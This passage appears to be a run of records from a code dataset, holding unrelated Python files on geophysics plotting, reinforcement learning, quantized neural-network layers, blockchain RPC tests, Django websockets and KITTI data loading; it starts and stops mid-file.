frequency.\ndata = np.r_[145.3, 435.8, 260.6, 875.1, 1502.7, 1516.9,\n 217.9, 412.5, 178.7, 516.5, 405.7, 255.7]\n\nfdp = FdemDataPoint(x=0.0, y=0.0, z=30.0, elevation=0.0,\n data=data, std=None, predictedData=None,\n system=fds, lineNumber=0.0, fiducial=0.0)\n\n###############################################################################\nplt.figure()\n_ = fdp.plot()\n\n################################################################################\n# Obtaining a datapoint from a dataset\n# ++++++++++++++++++++++++++++++++++++\n#\n# More often than not, our observed data is stored in a file on disk.\n# We can read in a dataset and pull datapoints from it.\n#\n# For more information about the frequency domain data set see :ref:`Frequency domain dataset`\n\n################################################################################\n# Set some paths and file names\ndataFolder = \"..//supplementary//Data//\"\n# The data file name\ndataFile = dataFolder + 'Resolve2.txt'\n# The EM system file 
name\nsystemFile = dataFolder + 'FdemSystem2.stm'\n\n################################################################################\n# Initialize and read an EM data set\nD = FdemData.read_csv(dataFile,systemFile)\n\n################################################################################\n# Get a data point from the dataset\nfdp = D.datapoint(0)\nplt.figure()\n_ = fdp.plot()\n\n################################################################################\n# Using a datapoint\n# +++++++++++++++++\n\n################################################################################\n# We can define a 1D layered earth model, and use it to predict some data\nnCells = 19\npar = StatArray(np.linspace(0.01, 0.1, nCells), \"Conductivity\", \"$\\frac{S}{m}$\")\nthk = StatArray(np.ones(nCells) * 10.0)\nthk[-1] = np.inf\nmod = Model1D(nCells = nCells, parameters=par, widths=thk)\n\n################################################################################\n# Forward model the data\nfdp.forward(mod)\n\n###############################################################################\nplt.figure()\nplt.subplot(121)\n_ = mod.pcolor()\nplt.subplot(122)\n_ = fdp.plot_predicted()\nplt.tight_layout()\n\n################################################################################\n# Compute the sensitivity matrix for a given model\nJ = fdp.sensitivity(mod)\nplt.figure()\n_ = np.abs(J).pcolor(equalize=True, log=10, flipY=True)\n\n################################################################################\n# Attaching statistical descriptors to the datapoint\n# ++++++++++++++++++++++++++++++++++++++++++++++++++\n#\n# Define a multivariate log normal distribution as the prior on the predicted data.\nfdp.predictedData.set_prior('MvLogNormal', fdp.data[fdp.active], fdp.std[fdp.active]**2.0)\n\n################################################################################\n# This allows us to evaluate the likelihood of the predicted data\nprint(fdp.likelihood(log=True))\n# Or the misfit\nprint(fdp.dataMisfit())\n\n################################################################################\n# We can perform a quick search for the best fitting half space\nhalfspace = fdp.FindBestHalfSpace()\nprint('Best half space conductivity is {} $S/m$'.format(halfspace.par))\nplt.figure()\n_ = fdp.plot()\n_ = fdp.plot_predicted()\n\n################################################################################\n# Compute the misfit between observed and predicted data\nprint(fdp.dataMisfit())\n\n\n# Set values of relative and additive error for both systems.\nfdp.relErr = 0.05\nfdp.addErr = 10.0\n\n################################################################################\n# Plot the misfits for a range of half space conductivities\nplt.figure()\n_ = fdp.plotHalfSpaceResponses(-6.0, 4.0, 200)\n\nplt.title(\"Halfspace responses\");\n\n# ################################################################################\n# # We can attach priors to the height of the datapoint,\n# # the relative error multiplier, and the additive error noise floor\n\n\n# # Define the distributions used as priors.\n# heightPrior = Distribution('Uniform', min=np.float64(fdp.z) - 2.0, max=np.float64(fdp.z) + 2.0)\n# relativePrior = Distribution('Uniform', min=0.01, max=0.5)\n# additivePrior = Distribution('Uniform', min=5, max=15)\n# fdp.set_priors(height_prior=heightPrior, relative_error_prior=relativePrior, additive_error_prior=additivePrior)\n\n# 
################################################################################\n# # In order to perturb our solvable parameters, we need to attach proposal distributions\n# heightProposal = Distribution('Normal', mean=fdp.z, variance = 0.01)\n# relativeProposal = Distribution('MvNormal', mean=fdp.relErr, variance=2.5e-7)\n# additiveProposal = Distribution('MvLogNormal', mean=fdp.addErr, variance=1e-4)\n# fdp.setProposals(heightProposal, relativeProposal, additiveProposal)\n\n# ################################################################################\n# # With priors set we can auto generate the posteriors\n# fdp.setPosteriors()\n\n# # Perturb the datapoint and record the perturbations\n# for i in range(10000):\n# fdp.forward(mod)\n# fdp.perturb(True, True, True, False)\n# fdp.updatePosteriors()\n\n# ################################################################################\n# # Plot the posterior distributions\n# # fig = plt.figure()\n# # gs = fig.add_gridspec(nrows=1, ncols=1)\n# # ax = fdp.init_posterior_plots(gs[0, 0])\n# # fig.tight_layout()\n\n# # fdp.plot_posteriors(axes=ax, best=fdp)\n\n# import h5py\n# with h5py.File('fdp.h5', 'w') as f:\n# fdp.toHdf(f, 'fdp', withPosterior=True)\n\n# with h5py.File('fdp.h5', 'r') as f:\n# fdp1 = FdemDataPoint.fromHdf(f['fdp'])\n\nprint('done')\nplt.show()","repo_name":"DOI-USGS/geobipy","sub_path":"docs/_downloads/247a416d19dc2e10bf9efc1d5dad114c/plot_frequency_datapoint.py","file_name":"plot_frequency_datapoint.py","file_ext":"py","file_size_in_byte":7950,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"10502993408","text":"import time\nfrom typing import Optional\n\nimport numpy as np\nfrom pbrl.algorithms.runner import BaseRunner\nfrom pbrl.env.env import VectorEnv\n\n\nclass Runner(BaseRunner):\n def __init__(\n self,\n env: VectorEnv,\n max_episode_steps=np.inf,\n render: Optional[float] = None,\n start_timestep: Optional[int] = None\n ):\n super(Runner, self).__init__(\n env=env,\n max_episode_steps=max_episode_steps,\n render=render\n )\n self.start_timestep = start_timestep\n\n def run(self, policy, buffer=None, timestep_num=0, episode_num=0):\n timestep = 0\n episode = 0\n episode_rewards = []\n episode_infos = []\n\n update = buffer is not None\n random = False\n # TD3\n if self.start_timestep is not None:\n random = True\n timestep_num = self.start_timestep\n self.start_timestep = None\n\n while True:\n observations = self.observations\n if update:\n actions, self.states_actor = policy.step(\n observations=observations,\n states_actor=self.states_actor,\n random=random,\n env_num=self.env_num\n )\n else:\n actions, self.states_actor = policy.act(observations, self.states_actor)\n self.observations, rewards, dones, infos = self.env.step(policy.wrap_actions(actions))\n\n timestep += self.env_num\n self.episode_rewards += rewards\n self.episode_steps += 1\n\n if self.render is not None:\n self.env.render()\n time.sleep(self.render)\n\n dones_real = dones & (self.episode_steps < self.max_episode_steps) # TD3' trick\n\n if update:\n policy.normalize_rewards(rewards, True, self.returns, dones_real)\n # add to buffer\n buffer.append(\n observations, # raw obs\n actions,\n self.observations, # raw obs_next\n rewards, # raw reward\n dones_real\n )\n\n for i in range(self.env_num):\n if dones[i]:\n episode += 1\n if policy.rnn:\n policy.reset_state(self.states_actor, i)\n episode_rewards.append(self.episode_rewards[i])\n episode_infos.append(infos[i])\n 
self.episode_rewards[i] = 0.0\n self.episode_steps[i] = 0\n\n if (timestep_num and timestep >= timestep_num) or (episode_num and episode >= episode_num):\n break\n\n if episode:\n return dict(\n episode=episode,\n timestep=timestep,\n reward=episode_rewards,\n info=episode_infos\n )\n else:\n return dict(timestep=timestep)\n","repo_name":"jjccero/pbrl","sub_path":"pbrl/algorithms/dqn/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"53"} +{"seq_id":"7531632855","text":"import random\nimport re\n\n\ndef get_level():\n while True:\n try:\n prompt = int(input(\"Level: \"))\n if prompt in [1, 2, 3]:\n return int(prompt)\n else:\n raise ValueError\n except ValueError:\n pass\n\n\ndef generate_integer(level):\n if level == 1:\n x = random.randint(0, 9)\n y = random.randint(0, 9)\n elif level == 2:\n x = random.randint(10, 99)\n y = random.randint(10, 99)\n elif level == 3:\n x = random.randint(100, 999)\n y = random.randint(100, 999)\n else:\n raise ValueError\n return x, y\n\n\ndef main():\n incorrect = 0\n score = 0\n level = get_level()\n x, y = generate_integer(level)\n for _ in range(10):\n answer = x + y\n ans = input(f\"{x} + {y} = \")\n if int(ans) == answer:\n score += 1\n incorrect = 0\n x, y = generate_integer(level)\n else:\n for _ in range(2):\n if int(ans) != answer:\n print(\"EEE\")\n ans = input(f\"{x} + {y} = \")\n incorrect += 1\n else:\n score += 1\n incorrect = 0\n x, y = generate_integer(level)\n break\n if incorrect == 2:\n print(\"EEE\")\n print(f'{x} + {y} = {answer}')\n incorrect = 0\n x, y = generate_integer(level)\n print(score)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"xpall/edx-cs50p-psets-clone","sub_path":"misc/professor.py","file_name":"professor.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31150384242","text":"n = 6\ntimes = [7, 10]\n\ndef solution(n, times):\n right = max(times) * n\n left = 1\n \n while left < right:\n mid = (left + right) // 2\n total = 0\n for time in times:\n total += mid // time\n if total >= n:\n right = mid\n else:\n left = mid + 1\n return left\n\nprint(solution(n, times))","repo_name":"JIKMAN/Algorithm","sub_path":"coding_test/programmers_입국심사.py","file_name":"programmers_입국심사.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9345435190","text":"import numpy as np\n\nimport openmdao.api as om\n\n\nclass KappaComp(om.ExplicitComponent):\n r\"\"\" Computes the term kappa in the drag equation:\n\n .. 
math::\n\n C_D = C_{D0} + \\kappa C_{L\\alpha} \\alpha^2\n\n \"\"\"\n def initialize(self):\n self.options.declare('num_nodes', types=int)\n\n def setup(self):\n nn = self.options['num_nodes']\n\n # Inputs\n self.add_input('mach', shape=(nn,), desc='Mach number', units=None)\n\n # Outputs\n self.add_output(name='kappa', val=np.zeros(nn), desc='induced drag coefficient', units=None)\n\n # Jacobian\n ar = np.arange(nn)\n self.declare_partials(of='kappa', wrt='mach', rows=ar, cols=ar)\n\n def compute(self, inputs, outputs):\n M = inputs['mach']\n\n idx_low = np.where(M < 1.15)[0]\n idx_high = np.where(M >= 1.15)[0]\n\n outputs['kappa'][idx_low] = 0.54 + 0.15 * (1.0 + np.tanh((M[idx_low] - 0.9) / 0.06))\n outputs['kappa'][idx_high] = 0.54 + 0.15 * (1.0 + np.tanh(0.25 / 0.06)) \\\n + 0.14 * (M[idx_high] - 1.15)\n\n def compute_partials(self, inputs, partials):\n M = inputs['mach']\n\n idx_low = np.where(M < 1.15)[0]\n idx_high = np.where(M >= 1.15)[0]\n\n k = 50.0 / 3.0\n tanh = np.tanh(k * (M[idx_low] - 0.9))\n sech2 = 1.0 - tanh**2\n\n partials['kappa', 'mach'][idx_low] = 2.5 * sech2\n partials['kappa', 'mach'][idx_high] = 0.14\n","repo_name":"OpenMDAO/dymos","sub_path":"dymos/examples/min_time_climb/aero/kappa_comp.py","file_name":"kappa_comp.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":165,"dataset":"github-code","pt":"53"} +{"seq_id":"21981809760","text":"import pandas as pd\nimport json\nfrom datenguidepy import get_statistics, Query\n\n# # Define functions to load datenguide data into data frames\n\n# default values (for testing)\nselected_stats = 'AI1903'\nyear = 2018\n\ndef get_population_all_years():\n '''\n Returns pop [dataframe]: the population for all Hesse regions from datenguide.py with columns 'name', 'year', 'id' and stat values\n '''\n selected_stats = 'BEVSTD' # Bevölkerungsstand (population statistic)\n selected_stats1 = 'R12411' # Fortschreibung des Bevölkerungsstandes (forward projection of populatin statistic)\n \n for _ in range(3): # Database may throw an error on the first query try\n try:\n q = Query.all_regions(parent='06')\n stat = q.add_field(selected_stats)\n stat.add_args({'statistics' : selected_stats1}) # One more level in this stat (exact source of the stat)\n\n pop = q.results(verbose_enums=True, add_units = True)\n break\n except:\n continue\n \n # for some reason entries are produced twice; remove them\n pop.drop_duplicates(inplace=True)\n \n pop = pop[['year', 'id', selected_stats]]\n \n return pop\n\n# Occasional database error when querying BEVSTD or others ('code': 'INTERNAL_SERVER_ERROR')\npop = get_population_all_years()\n#pop = pd.DataFrame() # Use this line in case the previous last line is commented-out\n\ndef get_data_all_years(selected_stats=selected_stats, norm=0, pop=pop):\n '''\n For a given `selected_stats` returns data and unit, where\n data [dataframe]: the chosen statistics from datenguide.py with columns 'name', 'year', 'id' and stat values\n units [string]: name of corresponding unit\n \n Input:\n norm [int]: 0 if no normalization requested, else normalization by population and multiplied by factor norm\n pop [datafram]: dataframe with the population of all Hesse regions\n '''\n \n for _ in range(3): # Database may throw an error on the first query try\n try:\n q = Query.all_regions(parent='06')\n stat = q.add_field(selected_stats)\n\n data = q.results(verbose_enums=True, add_units = True)\n break\n except:\n continue\n\n # for some reason entries are produced twice; remove 
them\n data.drop_duplicates(inplace=True)\n \n data, unit = data[['name', 'year', 'id', selected_stats]], data[selected_stats+'_unit'].iloc[0]\n\n if norm != 0:\n # Normalize dataframe data here by modifying selected_stats with the population dataframe\n df = pd.merge(data, pop, how='left')\n df[[selected_stats]] = df[selected_stats] / df['BEVSTD'] * norm\n \n data = df[['name', 'year', 'id', selected_stats]]\n \n return data, unit\n\ndef get_statistics_description(selected_stats=selected_stats):\n '''\n get the description string for statistics 'selected_stats'\n '''\n q = Query.all_regions(parent='06')\n stat = q.add_field(selected_stats)\n return stat.description()\n\n\n# # load geoJSON data\n\n# the geoJSON file was obtained from http://opendatalab.de/projects/geojson-utilities/ \n# (contains only data for Hessen on level NUTS3)\ngeojson_data = json.load(open('data/landkreise_simplify200.geojson','r'))\n\n# set property 'name' for the county name to make it consistent with datenguide data\nfor feature in geojson_data['features']:\n feature['properties']['name'] = feature['properties']['BEZ']\n\n# write to `geo_data` with identifier key named as `id` \n# TODO: why introduce a new variable here?\n\ngeo_data = {'features':[], 'id':[]}\nfor f in geojson_data['features']:\n f.update(id=f['properties']['AGS']) #f['properties']['GEN'])\n geo_data['features'].append(f)\n\n\n# # define and load all statistics that will be available in the app\n\n# 0. stats for tests:\n#stat_ids = ['AI1903', 'AI1904', 'BEV083']\n#normalize = [0, 1, 1000]\n\n# 1. Environmental\nstat_ids = ['AI1301', 'AI0106', 'AI0107', 'AI0109', 'AI0113', 'AI1902', 'AI1903', 'AI1905', 'AI1901', 'AI1904']\n# only without normalization\nnormalize = listofzeros = [0] * len(stat_ids)\n\n# 2. Population:\n#stat_ids = ['AI0701', 'BEV083', 'BEV084', 'BEV085', 'BEV086']\n#normalize = [0, 1000, 1000, 1000, 1000]\n\nstat_descriptions = [get_statistics_description(si) for si in stat_ids]\nstat_tuple = tuple(zip(stat_descriptions, stat_ids))\nstat_dict = dict((y, x) for x, y in stat_tuple)\n\nnorm = 0\nchoro_data_complete, units = dict(), dict()\nfor ix in range(len(stat_ids)):\n st = stat_ids[ix]\n norm = normalize[ix]\n choro_data_complete[st], units[st] = get_data_all_years(st, norm, pop)\n\nc = choro_data_complete[stat_ids[0]] # take one statistics data set for generating name/id mapping\nid_to_name = {ids: c.loc[c['id']==ids, 'name'][0] for ids in c['id'].unique()}","repo_name":"CorrelAid/cax-challenge-rhein-main","sub_path":"load_stats.py","file_name":"load_stats.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72271400167","text":"import torch\nfrom changan_plugin_pytorch.nn import qat\nfrom changan_plugin_pytorch.qtensor import QTensor\n\nfrom .functional import conv2d\n\n\nclass BatchNorm2d(torch.nn.Module):\n _QAT_MODULE = qat.BatchNorm2d\n\n def __init__(\n self,\n num_features,\n eps=1e-5,\n momentum=0.1,\n affine=True,\n track_running_stats=True,\n out_dtype=\"qint8\",\n ):\n super().__init__()\n self.num_features = num_features\n self.eps = eps\n self.momentum = momentum\n self.affine = affine\n self.track_running_stats = track_running_stats\n self.out_dtype = out_dtype\n\n self.register_buffer(\n \"weight\", torch.ones(self.num_features, 1, 1, 1)\n ) # dummy\n self.register_buffer(\n \"weight_scale\", torch.ones((self.num_features,))\n ) # lambda / sigma\n self.register_buffer(\n \"weight_zero_point\",\n 
torch.zeros(self.num_features, dtype=torch.int64),\n )\n self.register_buffer(\n \"zero_point\", torch.zeros(self.num_features, dtype=torch.int64)\n )\n self.register_buffer(\n \"bias\", torch.zeros(num_features)\n ) # -lambda * mean / sigma + beta\n self.register_buffer(\"scale\", torch.ones(1)) # out_scale\n self.register_buffer(\"bias_scale\", torch.ones(num_features))\n self.register_buffer(\n \"bias_zero_point\", torch.zeros(num_features, dtype=torch.int64)\n )\n\n @torch.no_grad()\n def forward(self, input):\n out, dequant_out_scale = conv2d(\n input=input.int_repr(),\n weight=self.weight,\n bias=self.bias,\n sumin=None,\n stride=(1, 1),\n padding=(0, 0),\n dilation=(1, 1),\n groups=self.num_features,\n padding_mode=\"zeros\",\n activation=\"\",\n input_scale=input.q_scale(),\n input_zero_point=input.q_zero_point(),\n input_dtype=input.dtype,\n weight_scale=self.weight_scale,\n weight_zero_point=self.weight_zero_point,\n weight_dtype=\"qint8\",\n bias_scale=self.bias_scale,\n bias_zero_point=self.bias_zero_point,\n bias_dtype=\"qint32\",\n sumin_scale=None,\n sumin_zero_point=None,\n sumin_dtype=None,\n scale=self.scale,\n zero_point=self.zero_point,\n dtype=self.out_dtype,\n )\n return QTensor(out, self.scale, self.out_dtype, per_channel_axis=-1)\n\n @classmethod\n def from_float(cls, mod):\n assert type(mod) == cls._QAT_MODULE, (\n \"qat.\"\n + cls.__name__\n + \".from_float only works for \"\n + cls._QAT_MODULE.__name__\n )\n activation_post_process = mod.activation_post_process\n out_dtype = (\n activation_post_process.dtype\n if activation_post_process is not None\n else None\n )\n assert out_dtype is not None\n qbn = cls(\n num_features=mod.bn.num_features,\n eps=mod.bn.eps,\n momentum=mod.bn.momentum,\n affine=mod.bn.affine,\n track_running_stats=True,\n out_dtype=out_dtype,\n )\n with torch.no_grad():\n running_std = torch.sqrt(mod.bn.running_var + mod.bn.eps)\n qbn.weight_scale.copy_(torch.abs(mod.bn.weight) / running_std)\n qbn.weight.copy_(\n (mod.bn.weight / running_std).reshape(-1, 1, 1, 1)\n )\n qbn.bias.copy_(\n -mod.bn.weight * mod.bn.running_mean / running_std\n + mod.bn.bias\n )\n qbn.scale.copy_(activation_post_process.scale)\n return qbn\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/nn/quantized/batchnorm.py","file_name":"batchnorm.py","file_ext":"py","file_size_in_byte":3788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10072803163","text":"import pytest\n\nfrom pokt.rpc.data.network import (\n get_height,\n get_supply,\n get_all_params,\n get_upgrade,\n get_supported_chains,\n get_param,\n get_version,\n get_state,\n)\nfrom pokt.rpc.models import (\n QuerySupplyResponse,\n AllParams,\n QueryHeightResponse,\n QuerySupplyResponse,\n QuerySupportedChainsResponse,\n Upgrade,\n StateResponse,\n IntParam,\n FloatParam,\n BoolParam,\n StrParam,\n SupportedBlockchainsParam,\n FeeMultiplierParam,\n UpgradeParam,\n ACLParam,\n)\n\n\ndef test_get_height_returns_nonzero_int(rpc_url, session):\n height = get_height(rpc_url, session)\n assert isinstance(height, QueryHeightResponse)\n assert height.height > 0\n\n\ndef test_get_version(rpc_url, session):\n version_resp = get_version(rpc_url, session)\n assert isinstance(version_resp, str)\n\n\ndef test_get_supply(rpc_url, session, height):\n supply_resp = get_supply(rpc_url, height=height, session=session)\n assert isinstance(supply_resp, QuerySupplyResponse)\n\n\ndef test_get_all_params(rpc_url, session, height):\n params_resp = 
get_all_params(rpc_url, height=height, session=session)\n assert isinstance(params_resp, AllParams)\n\n\ndef test_get_upgrade(rpc_url, session, height):\n upgrade_resp = get_upgrade(rpc_url, height=height, session=session)\n assert isinstance(upgrade_resp, Upgrade)\n\n\ndef test_get_supported_chains(rpc_url, session, height):\n supported_chains_resp = get_supported_chains(\n rpc_url, height=height, session=session\n )\n assert isinstance(supported_chains_resp, QuerySupportedChainsResponse)\n\n\ndef test_get_state(rpc_url, session, height):\n state_resp = get_state(rpc_url, height=height, session=session)\n assert isinstance(state_resp, StateResponse)\n\n\n@pytest.mark.parametrize(\n (\"param_name\", \"param_type\"),\n [\n (\"application/MaxApplications\", IntParam),\n (\"application/AppUnstakingTime\", IntParam),\n (\"application/MaximumChains\", IntParam),\n (\"application/StabilityAdjustment\", IntParam),\n (\"application/BaseRelaysPerPOKT\", IntParam),\n (\"application/ApplicationStakeMinimum\", IntParam),\n (\"pos/DAOAllocation\", IntParam),\n (\"pos/StakeMinimum\", IntParam),\n (\"pos/MaximumChains\", IntParam),\n (\"pos/RelaysToTokensMultiplier\", IntParam),\n (\"pos/MaxJailedBlocks\", IntParam),\n (\"pos/MaxValidators\", IntParam),\n (\"pos/UnstakingTime\", IntParam),\n (\"pos/DowntimeJailDuration\", IntParam),\n (\"pos/ProposerPercentage\", IntParam),\n (\"pos/BlocksPerSession\", IntParam),\n (\"pos/MaxEvidenceAge\", IntParam),\n (\"pos/SignedBlocksWindow\", IntParam),\n (\"pocketcore/SessionNodeCount\", IntParam),\n (\"pocketcore/ClaimSubmissionWindow\", IntParam),\n (\"pocketcore/ReplayAttackBurnMultiplier\", IntParam),\n (\"pocketcore/ClaimExpiration\", IntParam),\n (\"pocketcore/MinimumNumberOfProofs\", IntParam),\n (\"auth/MaxMemoCharacters\", IntParam),\n (\"auth/TxSigLimit\", IntParam),\n (\"pos/StakeDenom\", StrParam),\n (\"gov/daoOwner\", StrParam),\n (\"pos/SlashFractionDoubleSign\", FloatParam),\n (\"pos/SlashFractionDowntime\", FloatParam),\n (\"pos/MinSignedPerWindow\", FloatParam),\n (\"application/ParticipationRateOn\", BoolParam),\n (\"pocketcore/SupportedBlockchains\", SupportedBlockchainsParam),\n (\"auth/FeeMultipliers\", FeeMultiplierParam),\n (\"gov/acl\", ACLParam),\n (\"gov/upgrade\", UpgradeParam),\n ],\n)\ndef test_get_params(rpc_url, session, height, param_name, param_type):\n param_resp = get_param(rpc_url, param_name, height=height, session=session)\n assert isinstance(param_resp, param_type)\n","repo_name":"pokt-foundation/pypokt","sub_path":"tests/test_rpc_network.py","file_name":"test_rpc_network.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"32807674412","text":"# Input values\n\nN, M, K = map(int, input().split())\n\nfireball = []\nfor _ in range(M) :\n r, c, m, s, d = list(map(int, input().split()))\n fireball.append([r, c, m, s, d])\n\nfire_map = [[[] for _ in range(N)] for _ in range(N)]\n\ndx = [-1, -1, 0, 1, 1, 1, 0, -1]\ndy = [0, 1, 1, 1, 0, -1, -1, -1]\n\n# Move the fireballs!\n\nfor _ in range(K) :\n while fireball :\n sr, sc, sm, ss, sd = fireball.pop(0)\n nr = (sr + ss * dx[sd]) % N\n nc = (sc + ss * dy[sd]) % N\n fire_map[nr][nc].append([sm, ss, sd])\n\n for x in range(N):\n for y in range(N) :\n # When two or more fireballs share a cell\n if len(fire_map[x][y]) > 1 :\n sum_m, sum_s, cnt_odd, cnt_even, cnt = 0, 0, 0, 0, len(fire_map[x][y])\n\n while fire_map[x][y] :\n bm, bs, bd = fire_map[x][y].pop(0)\n sum_m += bm\n sum_s += bs\n\n if bd % 2 == 0 :\n cnt_even += 1\n else :\n cnt_odd += 1\n\n if cnt_even == cnt or cnt_odd == cnt :\n nd = [0, 2, 4, 6]\n else :\n nd = [1, 3, 5, 7]\n\n if sum_m // 5 != 0 :\n for d in nd :\n fireball.append([x, y, sum_m//5, sum_s//cnt, d])\n # When exactly one fireball is on a cell\n if len(fire_map[x][y]) == 1 :\n fireball.append([x, y] + fire_map[x][y].pop())\n\nprint(sum([x[2] for x in fireball]))\n","repo_name":"uss96/CodingTest","sub_path":"삼전코테/백준 삼전 코테 문제/마법사 상어와 파이어볼/마법사 상어와 파이어볼 (정답 참고).py","file_name":"마법사 상어와 파이어볼 (정답 참고).py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22213744255","text":"import numpy as np\r\nimport pickle\r\n\r\nclass play:\r\n def __init__(self,model, weights, sequence_length=10,cmd2number_reward = \"\",GAMMA=0.9):\r\n self.model = model\r\n self.weights = weights\r\n self.GAMMA = GAMMA\r\n self.sequence_length = sequence_length # was missing: get_command references self.sequence_length\r\n\r\n self.cmds = 0\r\n self.state = np.zeros(sequence_length)\r\n self.state_index = 0\r\n\r\n if isinstance(cmd2number_reward, str):\r\n #if string load from file\r\n self.cmd2number_reward = pickle.load(open(cmd2number_reward,\"rb\"))\r\n else:\r\n # if dictionary\r\n self.cmd2number_reward = cmd2number_reward\r\n\r\n self.featureExpectations = np.zeros(len(weights))\r\n self.last_reward = None\r\n self.ready = False\r\n\r\n def get_command(self,cmd):\r\n # Check if the command is known\r\n if cmd in self.cmd2number_reward:\r\n cmd_num, reward = self.cmd2number_reward[cmd]\r\n else:\r\n cmd_num, reward = self.cmd2number_reward[\"unknown\"]\r\n\r\n if self.state_index >= 1:\r\n if self.state_index == self.sequence_length:\r\n # The oldest command is erased and the newest is introduced\r\n self.state = np.roll(self.state, -1) # np.roll returns a new array; the result was previously discarded\r\n self.state[self.sequence_length - 1] = cmd_num\r\n else:\r\n # The next command is added to the state\r\n self.state[self.state_index] = cmd_num\r\n self.state_index = self.state_index + 1\r\n\r\n\r\n # 56 is the \"exit\" command\r\n if cmd_num == 56:\r\n # The state is reset\r\n self.state = np.zeros(self.sequence_length)\r\n self.state_index = 0\r\n else:\r\n # The state is a sequence of the last params[\"sequence_length\"] commands given\r\n # Here the first command is inputed into the state\r\n self.state[self.state_index] = cmd_num\r\n self.state_index = self.state_index + 1\r\n self.cmds += 1\r\n\r\n if len(self.state.shape) == 1:\r\n batch_state = np.expand_dims(self.state, axis=0)\r\n else:\r\n batch_state = self.state\r\n # Choose action.\r\n action = (np.argmax(self.model.predict(batch_state, batch_size=1)[0]))\r\n\r\n if self.last_reward is not None:\r\n if self.cmds > 100:\r\n self.featureExpectations += (self.GAMMA ** (self.cmds - 101)) * np.array(self.state)\r\n # print (\"Feature Expectations :: \", featureExpectations)\r\n # Tell us something.\r\n if self.cmds % 2000 == 0:\r\n print(\"Current distance: %d frames.\" % self.cmds)\r\n print(\"featureExpectations ready\")\r\n self.ready = True\r\n self.last_reward = reward\r\n","repo_name":"adpauna/irassh","sub_path":"irassh/rl/playing.py","file_name":"playing.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14819332333","text":"import pytest\nfrom channels.routing import URLRouter\nfrom channels.testing import WebsocketCommunicator\nfrom django.core.cache import cache\n\nfrom boards.routing import websocket_urlpatterns\n\n\n@pytest.mark.asyncio\nclass TestBoardConsumer:\n async def test_session_connect_disconnect_websocket_message(self, board):\n 
application = URLRouter(websocket_urlpatterns)\n board_group_name = f\"board-{board.slug}\"\n assert await cache.aget(board_group_name) is None\n\n communicator1 = WebsocketCommunicator(application, f\"/ws/boards/{board.slug}/\")\n await communicator1.connect()\n message = await communicator1.receive_from()\n assert \"session_connected\" in message\n assert '\"sessions\": 1' in message\n assert await cache.aget(board_group_name) == 1\n\n communicator2 = WebsocketCommunicator(application, f\"/ws/boards/{board.slug}/\")\n await communicator2.connect()\n message = await communicator1.receive_from()\n assert \"session_connected\" in message\n assert '\"sessions\": 2' in message\n assert await cache.aget(board_group_name) == 2\n\n await communicator2.disconnect()\n message = await communicator1.receive_from()\n assert \"session_disconnected\" in message\n assert '\"sessions\": 1' in message\n assert await cache.aget(board_group_name) == 1\n\n await communicator1.disconnect()\n assert await cache.aget(board_group_name) is None\n","repo_name":"oscarsiles/jotlet","sub_path":"boards/tests/test_consumers.py","file_name":"test_consumers.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36595417634","text":"import glob\nimport torch.multiprocessing\n\nimport numpy as np\nimport os\n\nfrom torch.utils.data import Dataset\n\nfrom dataset.original_method.kitti_dataset_utils import \\\n pose_from_oxts_packet, read_calib_file, transform_from_rot_trans\nfrom dataset.utils.image import load_image\nfrom dataset.utils.transforms import to_tensor_transforms\nfrom dataset.data_prepocess.Matrix_Angle import R_to_angle\n\n########################################################################################################################\ntorch.multiprocessing.set_sharing_strategy('file_system')\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0,1,2,3\"\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n#print(\"using {} device.\".format(device))\n\n# Cameras from the stereo pair (left is the origin)\nIMAGE_FOLDER = {\n 'left': 'image_02',\n 'right': 'image_03',\n}\n'''\nIMAGE_FOLDER = {\n 'left': 'image_02',\n}'''\n# Name of different calibration files\nCALIB_FILE = {\n 'cam2cam': 'calib_cam_to_cam.txt',\n 'velo2cam': 'calib_velo_to_cam.txt',\n 'imu2velo': 'calib_imu_to_velo.txt',\n}\nPNG_DEPTH_DATASETS = ['groundtruth']\nOXTS_POSE_DATA = 'oxts'\n\n\n########################################################################################################################\n#### FUNCTIONS\n########################################################################################################################\ndef extract_idx(path):\n day = path.split('/')[-4].split('_')\n index = path.split('/')[-1].split('.')[0]\n index = int(day[1] + day[2] + day[4] + index)\n return index\n\n\n'''def extract_idx(path):\n day = path.split('/')[-4].split('_')\n index = path.split('/')[-1].split('.')[0]\n index = int(day[0] + day[1] + day[2] + day[4] + index) errors out when the number exceeds 19 digits\n return index'''\n\n\ndef find_path(idx):\n roo_dir = '/home/zhanl/data/kitti/raw//'\n seq = str(idx)\n if idx // 10 ** 16 > 9:\n i = 1\n seq1 = seq[0:2] # 10\n else:\n i = 0\n seq1 = '0' + seq[0] # 09\n seq2 = seq[i + 1:i + 3] # date\n seq3 = seq[i + 3:i + 7]\n seq4 = seq[i + 7:i + 17]\n path = roo_dir + '2011_' + seq1 + '_' + seq2 + '/' + '2011_' + seq1 + '_' + seq2 + 